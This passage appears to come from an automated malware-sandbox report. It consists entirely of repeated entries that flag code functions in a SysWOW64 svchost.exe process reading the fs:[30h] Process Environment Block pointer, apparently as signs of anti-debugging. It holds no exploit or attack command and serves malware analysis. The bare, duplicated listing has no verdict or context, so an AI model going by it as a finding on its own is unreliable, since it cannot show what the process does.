Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]	2_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]	2_2_03BC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]	2_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]	2_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]	2_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]	2_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]	2_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]	2_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]	2_2_03BE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]	2_2_03BD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]	2_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]	2_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03BBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]	2_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]	2_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]	2_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]	2_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]	2_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]	2_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]	2_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]	2_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]	2_2_03BBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]	2_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]	2_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]	2_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]	2_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]	2_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]	2_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]	2_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]	2_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]	2_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]	2_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]	2_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]	2_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]	2_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]	2_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]	2_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]	2_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]	2_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]	2_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]	2_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]	2_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]	2_2_03B6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]	2_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]	2_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]	2_2_03B64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]	2_2_03B325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]	2_2_03B365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]	2_2_03BC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]	2_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]	2_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03B644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03BBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]	2_2_03B364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]	2_2_03BEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03B304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]	2_2_03B6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]	2_2_03B2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]	2_2_03BBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]	2_2_03BEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]	2_2_03B2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]	2_2_03B5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]	2_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]	2_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03B5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03BBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03BDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]	2_2_03C04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03B2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]	2_2_03B28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]	2_2_03BDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03BC6B40
